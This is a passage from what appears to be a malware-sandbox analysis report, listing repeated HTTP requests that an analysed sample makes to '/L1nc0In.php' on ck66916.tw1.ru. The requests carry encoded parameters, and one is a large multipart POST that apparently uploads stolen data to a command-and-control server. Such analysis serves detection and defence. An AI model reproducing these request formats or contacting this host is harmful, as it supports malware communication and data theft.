2Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIhFWN4YzY5IjZyIWZ5gTZycjY3EDOyYzYwAzN0YmM5MmZwcTZhNWY3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=d1nIRZWa0IjYwJFWklGbtNGMOhVYFZVbjhGZIRWb5ITVjhnVZBjRHJFdG12YulTbjFFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJhmWqlFaxMUT0klaOJTUE1Ua05GT5IERNdXQE10dBRUT1VkaMdHND10NKl2Tp1EWaVXOHF2d502Yqx2VUl2dplUavpWS6FzVZpmSXpFWKNETpRzRYlHeW1kWGVEVR5kVTVEeGhVd3ZEWjhHbJZTS5NWdWdlW55kMVl2dplUdkNjY1RXbiZlSp9UaBZ1UPZURUl2dpl0QkVUSwkUaPlGMVF1UKNETpRjMkZXNyEWdWxWS2k0QiNnRyQGbKhVYHp0QMlWSYp1a1clWtZ1RSdWTzQmdS1mYwRGbJZTS5NWMKhVYyw2RkVnRrl0cJlWUIpVRXJTSp9Ua0IjYw5kbjxmWxUFUstWUpdXaJlXUE9EeFpWT4VkaNlHND5kMJtGTwkkaNVTSE90dJpGTXJERNVXRE1UejZFVXpUaPlWVXJGa1ATVQx2aRl2dplUMFRlT1kFVPdXQU1EMFpWTwUlaNVTSp9UaRV1UrpEWZZnStNGbodEZ2FzaJNXSpF1TSpHVDZVVNhkUU5UavpWS5ZVbjFjUzkFaadFZ1Z0VUtmSYlldK12Ysh2RkZXMrl0cJNkTUZFRWhlTq5UN0ADVp9maJxWMXl1TS12YolTbZlnVHFGM5cFVpdXaJhXSYp1c4JjY5JlbiZnTwIGbSdVYXpUaPlWUXNFbOdVYyY1RSZlQxIVa3lWS2gWRJBTWqlkNJNlWwYUbV9mTYpVeadlWThGWZ5kVGVFSKNETp1kbjZHeyImaClmT1kkeOJzaE5UNJRkTndGSJBTSE1EeBNUZnFERPlXRqlkNJlmY2x2RkdHbtNmaOhlWFZ1RaZXMwIGbSdVYXZlRVhkSDxUaJBjUnVkaJZTSTVWe5clYsFDMixmUXF2VWZUVIp0QMlWVxMFUotmTQpUaPlWSzImeOhlWqlTbjFVOXp1as1mVWJUMSl2dplUMJl2TpVVbjFjUzkFbShVYv5UbjJUOXp1as1mVWJUMSl2dplURWVkUH5ERTRDMrlkNJNlW0ZUbUZlQxIVa3lWSxkERNRTQE9kQspXTGpUaPlWUXNVe5IzY6ZlMZZnSIVlVCFTUpdXaJhXVGVFRKl2TpF1VTxmTXFmMWdkUWJUMRl2dD1kNJlmY2xmMjBnWYp1UWZUVEp0QMl2bINlTCNUT3FkaNl2bql0aWdlW35UMhpWOHJGRS5mYspkbjFjTVZVUOtWSzl0URZHNrlkNJNkWsZ1RjRFdykld4JTUzZUbilnVHRGNWVlVR50aJNXSpFFc0VUS3FFROhXWqlkNJNlW2wmMVxGaykFaOBTTNZlRVRkSDxUaJVVYMJ0QPBTQq1UavpWSsBHWhRlVHFmaGJTU5dXVWFlTrl0cJN1Tp9maJxmSYRGMOdlWww2RhpmSYFlVCFTUpd3UNZTS5NWe5IzY6ZlMZZnSIV1cGJTWwRmMi1kVGVFRKNETw8maJpnVtNmdOVlVR50aJNXSD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXNVavpWS1lzVhBjQYFWeOJzYsJVVWFlTrl0cJlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIhFWN4YzY5IjZyIWZ5gTZycjY3EDOyYzYwAzN0YmM5MmZwcTZhNWY3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=QX9JSUNJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryCZvrRLBBKVwcdizJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: ck66916.tw1.ruContent-Length: 127919Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlk